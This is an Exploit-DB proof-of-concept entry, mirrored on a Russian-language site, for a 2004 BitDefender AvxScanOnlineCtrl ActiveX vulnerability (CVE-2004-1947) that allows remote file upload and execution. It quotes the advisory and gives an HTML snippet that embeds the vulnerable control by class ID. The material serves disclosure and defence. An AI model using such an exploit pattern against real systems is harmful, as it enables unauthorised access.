- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24024
- Проверка EDB
-
- Пройдено
- Автор
- RAFEL IVGI THE-INSIDER
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2004-1947
- Дата публикации
- 2004-04-19
HTML:
source: https://www.securityfocus.com/bid/10174/info
Reportedly the BitDefender AvxScanOnlineCtrl COM object is affected by a file upload and execution vulnerability. This issue is due to a design error that allows a remote user to specify a file to be uploaded and executed on a system running the affected software.
This issue may be leveraged by a remote attacker to upload and execute arbitrary files on an affected system; most likely resulting in unauthorized access. Other attackers are also possible.
<HTML>
<OBJECT id=seemycomputer codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1 hspace=0 vspace=0 align="top" classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>
</HTML>- Источник
- www.exploit-db.com
